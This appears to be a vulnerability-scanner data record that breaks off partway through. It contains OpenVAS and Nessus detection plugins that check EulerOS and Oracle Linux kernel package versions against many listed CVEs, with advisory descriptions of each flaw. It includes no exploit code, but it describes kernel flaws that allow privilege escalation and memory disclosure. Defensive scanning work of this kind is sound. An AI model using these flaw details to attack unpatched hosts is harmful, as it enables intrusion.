02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1536\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-7263\", \"CVE-2013-7445\", \"CVE-2013-7446\", \"CVE-2014-4611\", \"CVE-2014-5471\", \"CVE-2014-9914\", \"CVE-2015-0571\", \"CVE-2015-8104\", \"CVE-2015-8950\", \"CVE-2016-2550\", \"CVE-2016-2847\", \"CVE-2016-4557\", \"CVE-2016-9178\", \"CVE-2017-1000370\", \"CVE-2017-10661\", \"CVE-2017-14991\", \"CVE-2017-17558\", \"CVE-2017-9150\", \"CVE-2018-10940\", \"CVE-2018-18021\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:08:11 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1536)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1536\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1536\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1536 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The offset2lib patch as used in the Linux Kernel contains a vulnerability that allows a PIE binary to be execve()'ed with 1GB of arguments or environmental strings then the stack occupies the address 0x80000000 and the PIE binary is mapped above 0x40000000 nullifying the protection of the offset2lib patch. This affects Linux Kernel version 4.11.5 and earlier. This is a different issue than CVE-2017-1000371. This issue appears to be limited to i386 based systems.(CVE-2017-1000370)\n\nInteger overflow in the LZ4 algorithm implementation, as used in Yann Collet LZ4 before r118 and in the lz4_uncompress function in lib/lz4/lz4_decompress.c in the Linux kernel before 3.15.2, on 32-bit platforms might allow context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted Literal Run that would be improperly handled by programs not complying with an API limitation, a different vulnerability than CVE-2014-4715.(CVE-2014-4611)\n\nThe replace_map_fd_with_map_ptr function in kernel/bpf/verifier.c in the Linux kernel before 4.5.5 does not properly maintain an fd data structure, which allows local users to gain privileges or cause a denial of service (use-after-free) via crafted BPF instructions that reference an incorrect file descriptor.(CVE-2016-4557)\n\nThe usb_destroy_configuration() function, in 'drivers/usb/core/config.c' in the USB core subsystem, in the Linux kernel through 4.14.5 does not consider the maximum number of configurations and interfaces before attempting to release resources. This allows local users to cause a denial of service, due to out-of-bounds write access, or possibly have unspecified other impact via a crafted USB device. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2017-17558)\n\nThe cdrom_ioctl_media_changed function in drivers/cdrom/cdrom.c in the Linux kernel before 4.16.6 allows local attackers to use a incorrect bounds check in the CDROM driver CDROM_MEDIA_CHANGED ioctl to read out kernel memory.(CVE-2018-10940)\n\nIt was found that the parse_rock_ridge_inode_internal() function of the Linux kernel's ISOFS implementation did not correctly check relocated directories when processing Rock Ridge child link (CL) tags. An attacker with physical access to the system could use a specially crafted ISO image to crash the system or, potentially, escalate their privileges on the system.(CVE-2014-5471)\n\nA flaw was found in the Linux kernel's implementation of Unix sockets. A server polling for client-socket data could put the peer ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "naslFamily": "Huawei EulerOS Local Security Checks"}
{"nessus": [{"lastseen": "2022-02-28T13:14:50", "description": "According to the versions of the kernel packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - The offset2lib patch as used in the Linux Kernel contains a vulnerability that allows a PIE binary to be execve()'ed with 1GB of arguments or environmental strings then the stack occupies the address 0x80000000 and the PIE binary is mapped above 0x40000000 nullifying the protection of the offset2lib patch. This affects Linux Kernel version 4.11.5 and earlier. This is a different issue than CVE-2017-1000371. This issue appears to be limited to i386 based systems.(CVE-2017-1000370i1/4%0\n\n - Integer overflow in the LZ4 algorithm implementation, as used in Yann Collet LZ4 before r118 and in the lz4_uncompress function in lib/lz4/lz4_decompress.c in the Linux kernel before 3.15.2, on 32-bit platforms might allow context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted Literal Run that would be improperly handled by programs not complying with an API limitation, a different vulnerability than CVE-2014-4715.(CVE-2014-4611i1/4%0\n\n - The replace_map_fd_with_map_ptr function in kernel/bpf/verifier.c in the Linux kernel before 4.5.5 does not properly maintain an fd data structure, which allows local users to gain privileges or cause a denial of service (use-after-free) via crafted BPF instructions that reference an incorrect file descriptor.(CVE-2016-4557i1/4%0\n\n - The usb_destroy_configuration() function, in 'drivers/usb/core/config.c' in the USB core subsystem, in the Linux kernel through 4.14.5 does not consider the maximum number of configurations and interfaces before attempting to release resources. This allows local users to cause a denial of service, due to out-of-bounds write access, or possibly have unspecified other impact via a crafted USB device. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2017-17558i1/4%0\n\n - The cdrom_ioctl_media_changed function in drivers/cdrom/cdrom.c in the Linux kernel before 4.16.6 allows local attackers to use a incorrect bounds check in the CDROM driver CDROM_MEDIA_CHANGED ioctl to read out kernel memory.(CVE-2018-10940i1/4%0\n\n - It was found that the parse_rock_ridge_inode_internal() function of the Linux kernel's ISOFS implementation did not correctly check relocated directories when processing Rock Ridge child link (CL) tags. An attacker with physical access to the system could use a specially crafted ISO image to crash the system or, potentially, escalate their privileges on the system.(CVE-2014-5471i1/4%0\n\n - A flaw was found in the Linux kernel's implementation of Unix sockets. A server polling for client-socket data could put the peer socket on a wait list the peer socket could then close the connection, making the reference on the wait list no longer valid. This could lead to bypassing the permissions on a Unix socket and packets being injected into the stream, and could also panic the machine (denial of service).(CVE-2013-7446i1/4%0\n\n - The do_check function in kernel/bpf/verifier.c in the Linux kernel before 4.11.1 does not make the allow_ptr_leaks value available for restricting the output of the print_bpf_insn function, which allows local users to obtain sensitive address information via crafted bpf system calls.(CVE-2017-9150i1/4%0\n\n - The WLAN (aka Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not verify authorization for private SET IOCTL calls, which allows attackers to gain privileges via a crafted application, related to wlan_hdd_hostapd.c and wlan_hdd_wext.c.(CVE-2015-0571i1/4%0\n\n - arch/arm64/kvm/guest.c in KVM in the Linux kernel before 4.18.12 on the arm64 platform mishandles the KVM_SET_ON_REG ioctl. This is exploitable by attackers who can create virtual machines. An attacker can arbitrarily redirect the hypervisor flow of control (with full register control). An attacker can also cause a denial of service (hypervisor panic) via an illegal exception return. This occurs because of insufficient restrictions on userspace access to the core register file, and because PSTATE.M validation does not prevent unintended execution modes.(CVE-2018-18021i1/4%0\n\n - A resource-exhaustion vulnerability was found in the kernel, where an unprivileged process could allocate and accumulate far more file descriptors than the process' limit. A local, unauthenticated user could exploit this flaw by sending file descriptors over a Unix socket and then closing them to keep the process' fd count low, thereby creating kernel-memory or file-descriptors exhaustion (denial of service).(CVE-2016-2550i1/4%0\n\n - The Linux kernel before 3.12.4 updates certain length values before ensuring that associated data structures have been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call, related to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c, net/ipv6/raw.c, and net/ipv6/udp.c.(CVE-2013-7263i1/4%0\n\n - It is possible for a single process to cause an OOM condition by filling large pipes with data that are never read. A typical process filling 4096 pipes with 1 MB of data will use 4 GB of memory and there can be multiple such processes, up to a per-user-limit.(CVE-2016-2847i1/4%0\n\n - The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux kernel before 4.7.5 does not initialize a certain integer variable, which allows local users to obtain sensitive information from kernel stack memory by triggering failure of a get_user_ex call.(CVE-2016-9178i1/4%0\n\n - It was found that the x86 ISA (Instruction Set Architecture) is prone to a denial of service attack inside a virtualized environment in the form of an infinite loop in the microcode due to the way (sequential) delivering of benign exceptions such as #DB (debug exception) is handled. A privileged user inside a guest could use this flaw to create denial of service conditions on the host kernel.(CVE-2015-8104i1/4%0\n\n - The Direct Rendering Manager (DRM) subsystem in the Linux kernel through 4.x mishandles requests for Graphics Execution Manager (GEM) objects, which allows context-dependent attackers to cause a denial of service (memory consumption) via an application that processes graphics data, as demonstrated by JavaScript code that creates many CANVAS elements for rendering by Chrome or Firefox.(CVE-2013-7445i1/4%0\n\n - A flaw was found in the Linux kernel which does not initialize certain data structures used by DMA transfer on ARM64 based systems. This could allow local users to obtain sensitive information from kernel memory by triggering a dma_mmap call and reconstructing the data.(CVE-2015-8950i1/4%0\n\n - A race condition was found in the Linux kernel before version 4.11-rc1 in 'fs/timerfd.c' file which allows a local user to cause a kernel list corruption or use-after-free via simultaneous operations with a file descriptor which leverage improper 'might_cancel' queuing. An unprivileged local user could use this flaw to cause a denial of service of the system. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2017-10661i1/4%0\n\n - The sg_ioctl() function in 'drivers/scsi/sg.c' in the Linux kernel, from version 4.12-rc1 to 4.14-rc2, allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for '/dev/sg0'.(CVE-2017-14991i1/4%0\n\n - A race condition in the ip4_datagram_release_cb function in net/ipv4/datagram.c in the Linux kernel allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging incorrect expectations about locking during multithreaded access to internal data structures for IPv4 UDP sockets.(CVE-2014-9914i1/4%0\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1536)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7263", "CVE-2013-7445", "CVE-2013-7446", "CVE-2014-4611", "CVE-2014-5471", "CVE-2014-9914", "CVE-2015-0571", "CVE-2015-8104", "CVE-2015-8950", "CVE-2016-2550", "CVE-2016-2847", "CVE-2016-4557", "CVE-2016-9178", "CVE-2017-1000370", "CVE-2017-10661", "CVE-2017-14991", "CVE-2017-17558", "CVE-2017-9150", "CVE-2018-10940", "CVE-2018-18021"], "modified": "2021-05-03T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1536.NASL", "href": "https://www.tenable.com/plugins/nessus/124989", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124989);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/03\");\n\n script_cve_id(\n \"CVE-2013-7263\",\n \"CVE-2013-7445\",\n \"CVE-2013-7446\",\n \"CVE-2014-4611\",\n \"CVE-2014-5471\",\n \"CVE-2014-9914\",\n \"CVE-2015-0571\",\n \"CVE-2015-8104\",\n \"CVE-2015-8950\",\n \"CVE-2016-2550\",\n \"CVE-2016-2847\",\n \"CVE-2016-4557\",\n \"CVE-2016-9178\",\n \"CVE-2017-1000370\",\n \"CVE-2017-10661\",\n \"CVE-2017-14991\",\n \"CVE-2017-17558\",\n \"CVE-2017-9150\",\n \"CVE-2018-10940\",\n \"CVE-2018-18021\"\n );\n script_bugtraq_id(\n 64686,\n 68218,\n 69396\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1536)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The offset2lib patch as used in the Linux Kernel\n contains a vulnerability that allows a PIE binary to be\n execve()'ed with 1GB of arguments or environmental\n strings then the stack occupies the address 0x80000000\n and the PIE binary is mapped above 0x40000000\n nullifying the protection of the offset2lib patch. This\n affects Linux Kernel version 4.11.5 and earlier. This\n is a different issue than CVE-2017-1000371. This issue\n appears to be limited to i386 based\n systems.(CVE-2017-1000370i1/4%0\n\n - Integer overflow in the LZ4 algorithm implementation,\n as used in Yann Collet LZ4 before r118 and in the\n lz4_uncompress function in lib/lz4/lz4_decompress.c in\n the Linux kernel before 3.15.2, on 32-bit platforms\n might allow context-dependent attackers to cause a\n denial of service (memory corruption) or possibly have\n unspecified other impact via a crafted Literal Run that\n would be improperly handled by programs not complying\n with an API limitation, a different vulnerability than\n CVE-2014-4715.(CVE-2014-4611i1/4%0\n\n - The replace_map_fd_with_map_ptr function in\n kernel/bpf/verifier.c in the Linux kernel before 4.5.5\n does not properly maintain an fd data structure, which\n allows local users to gain privileges or cause a denial\n of service (use-after-free) via crafted BPF\n instructions that reference an incorrect file\n descriptor.(CVE-2016-4557i1/4%0\n\n - The usb_destroy_configuration() function, in\n 'drivers/usb/core/config.c' in the USB core subsystem,\n in the Linux kernel through 4.14.5 does not consider\n the maximum number of configurations and interfaces\n before attempting to release resources. This allows\n local users to cause a denial of service, due to\n out-of-bounds write access, or possibly have\n unspecified other impact via a crafted USB device. Due\n to the nature of the flaw, privilege escalation cannot\n be fully ruled out, although we believe it is\n unlikely.(CVE-2017-17558i1/4%0\n\n - The cdrom_ioctl_media_changed function in\n drivers/cdrom/cdrom.c in the Linux kernel before 4.16.6\n allows local attackers to use a incorrect bounds check\n in the CDROM driver CDROM_MEDIA_CHANGED ioctl to read\n out kernel memory.(CVE-2018-10940i1/4%0\n\n - It was found that the parse_rock_ridge_inode_internal()\n function of the Linux kernel's ISOFS implementation did\n not correctly check relocated directories when\n processing Rock Ridge child link (CL) tags. An attacker\n with physical access to the system could use a\n specially crafted ISO image to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2014-5471i1/4%0\n\n - A flaw was found in the Linux kernel's implementation\n of Unix sockets. A server polling for client-socket\n data could put the peer socket on a wait list the peer\n socket could then close the connection, making the\n reference on the wait list no longer valid. This could\n lead to bypassing the permissions on a Unix socket and\n packets being injected into the stream, and could also\n panic the machine (denial of service).(CVE-2013-7446i1/4%0\n\n - The do_check function in kernel/bpf/verifier.c in the\n Linux kernel before 4.11.1 does not make the\n allow_ptr_leaks value available for restricting the\n output of the print_bpf_insn function, which allows\n local users to obtain sensitive address information via\n crafted bpf system calls.(CVE-2017-9150i1/4%0\n\n - The WLAN (aka Wi-Fi) driver for the Linux kernel 3.x\n and 4.x, as used in Qualcomm Innovation Center (QuIC)\n Android contributions for MSM devices and other\n products, does not verify authorization for private SET\n IOCTL calls, which allows attackers to gain privileges\n via a crafted application, related to\n wlan_hdd_hostapd.c and\n wlan_hdd_wext.c.(CVE-2015-0571i1/4%0\n\n - arch/arm64/kvm/guest.c in KVM in the Linux kernel\n before 4.18.12 on the arm64 platform mishandles the\n KVM_SET_ON_REG ioctl. This is exploitable by attackers\n who can create virtual machines. An attacker can\n arbitrarily redirect the hypervisor flow of control\n (with full register control). An attacker can also\n cause a denial of service (hypervisor panic) via an\n illegal exception return. This occurs because of\n insufficient restrictions on userspace access to the\n core register file, and because PSTATE.M validation\n does not prevent unintended execution\n modes.(CVE-2018-18021i1/4%0\n\n - A resource-exhaustion vulnerability was found in the\n kernel, where an unprivileged process could allocate\n and accumulate far more file descriptors than the\n process' limit. A local, unauthenticated user could\n exploit this flaw by sending file descriptors over a\n Unix socket and then closing them to keep the process'\n fd count low, thereby creating kernel-memory or\n file-descriptors exhaustion (denial of\n service).(CVE-2016-2550i1/4%0\n\n - The Linux kernel before 3.12.4 updates certain length\n values before ensuring that associated data structures\n have been initialized, which allows local users to\n obtain sensitive information from kernel stack memory\n via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system\n call, related to net/ipv4/ping.c, net/ipv4/raw.c,\n net/ipv4/udp.c, net/ipv6/raw.c, and\n net/ipv6/udp.c.(CVE-2013-7263i1/4%0\n\n - It is possible for a single process to cause an OOM\n condition by filling large pipes with data that are\n never read. A typical process filling 4096 pipes with 1\n MB of data will use 4 GB of memory and there can be\n multiple such processes, up to a\n per-user-limit.(CVE-2016-2847i1/4%0\n\n - The __get_user_asm_ex macro in\n arch/x86/include/asm/uaccess.h in the Linux kernel\n before 4.7.5 does not initialize a certain integer\n variable, which allows local users to obtain sensitive\n information from kernel stack memory by triggering\n failure of a get_user_ex call.(CVE-2016-9178i1/4%0\n\n - It was found that the x86 ISA (Instruction Set\n Architecture) is prone to a denial of service attack\n inside a virtualized environment in the form of an\n infinite loop in the microcode due to the way\n (sequential) delivering of benign exceptions such as\n #DB (debug exception) is handled. A privileged user\n inside a guest could use this flaw to create denial of\n service conditions on the host kernel.(CVE-2015-8104i1/4%0\n\n - The Direct Rendering Manager (DRM) subsystem in the\n Linux kernel through 4.x mishandles requests for\n Graphics Execution Manager (GEM) objects, which allows\n context-dependent attackers to cause a denial of\n service (memory consumption) via an application that\n processes graphics data, as demonstrated by JavaScript\n code that creates many CANVAS elements for rendering by\n Chrome or Firefox.(CVE-2013-7445i1/4%0\n\n - A flaw was found in the Linux kernel which does not\n initialize certain data structures used by DMA transfer\n on ARM64 based systems. This could allow local users to\n obtain sensitive information from kernel memory by\n triggering a dma_mmap call and reconstructing the\n data.(CVE-2015-8950i1/4%0\n\n - A race condition was found in the Linux kernel before\n version 4.11-rc1 in 'fs/timerfd.c' file which allows a\n local user to cause a kernel list corruption or\n use-after-free via simultaneous operations with a file\n descriptor which leverage improper 'might_cancel'\n queuing. An unprivileged local user could use this flaw\n to cause a denial of service of the system. Due to the\n nature of the flaw, privilege escalation cannot be\n fully ruled out, although we believe it is\n unlikely.(CVE-2017-10661i1/4%0\n\n - The sg_ioctl() function in 'drivers/scsi/sg.c' in the\n Linux kernel, from version 4.12-rc1 to 4.14-rc2, allows\n local users to obtain sensitive information from\n uninitialized kernel heap-memory locations via an\n SG_GET_REQUEST_TABLE ioctl call for\n '/dev/sg0'.(CVE-2017-14991i1/4%0\n\n - A race condition in the ip4_datagram_release_cb\n function in net/ipv4/datagram.c in the Linux kernel\n allows local users to gain privileges or cause a denial\n of service (use-after-free) by leveraging incorrect\n expectations about locking during multithreaded access\n to internal data structures for IPv4 UDP\n sockets.(CVE-2014-9914i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1536\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4db9b001\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BPF doubleput UAF Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-18T14:58:30", "description": "The remote Oracle Linux 6 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2020-1524 advisory.\n\n - rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel through 5.3.6 lacks a certain upper-bound check, leading to a buffer overflow. (CVE-2019-17666)\n\n - The offset2lib patch as used by the Linux Kernel contains a vulnerability, if RLIMIT_STACK is set to RLIM_INFINITY and 1 Gigabyte of memory is allocated (the maximum under the 1/4 restriction) then the stack will be grown down to 0x80000000, and as the PIE binary is mapped above 0x80000000 the minimum distance between the end of the PIE binary's read-write segment and the start of the stack becomes small enough that the stack guard page can be jumped over by an attacker. This affects Linux Kernel version 4.11.5.\n This is a different issue than CVE-2017-1000370 and CVE-2017-1000365. This issue appears to be limited to i386 based systems. (CVE-2017-1000371)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-04-24T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : kernel (ELSA-2020-1524)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000365", "CVE-2017-1000370", "CVE-2017-1000371", "CVE-2019-17666"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-firmware", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2020-1524.NASL", "href": "https://www.tenable.com/plugins/nessus/135957", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2020-1524.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135957);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2017-1000371\", \"CVE-2019-17666\");\n script_xref(name:\"RHSA\", value:\"2020:1524\");\n\n script_name(english:\"Oracle Linux 6 : kernel (ELSA-2020-1524)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2020-1524 advisory.\n\n - rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel through 5.3.6 lacks a\n certain upper-bound check, leading to a buffer overflow. (CVE-2019-17666)\n\n - The offset2lib patch as used by the 